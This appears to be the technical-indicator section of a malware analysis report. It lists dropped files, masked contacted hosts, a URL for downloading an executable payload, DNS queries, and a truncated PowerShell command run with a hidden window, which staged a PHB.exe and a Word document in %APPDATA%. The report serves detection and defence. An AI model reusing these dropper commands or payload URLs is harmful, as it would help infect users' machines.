Technical Information
- %APPDATA%\4i1.doc
- %APPDATA%\~$4i1.doc
- %APPDATA%\4i1.doc
- %APPDATA%\4i1.doc
- 'ho######rolservices.co.il':80
- 'sn##.com':80
- http://ho######rolservices.co.il/wp-content/uploads/2015/rogo/IS.exe
- http://www.sn##.com/xml/xslt/sample.doc
- DNS query for ho######rolservices.co.il
- DNS query for sn##.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -noprofile $file = $env:APPDATA + '\PHB.exe';$docpath = $env:APPDATA + '\4I1.doc';If (test-path $file) {Remove-Item $file} If (test-path $docpath) {Remove-Item $docpath}...' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%APPDATA%\4I1.doc"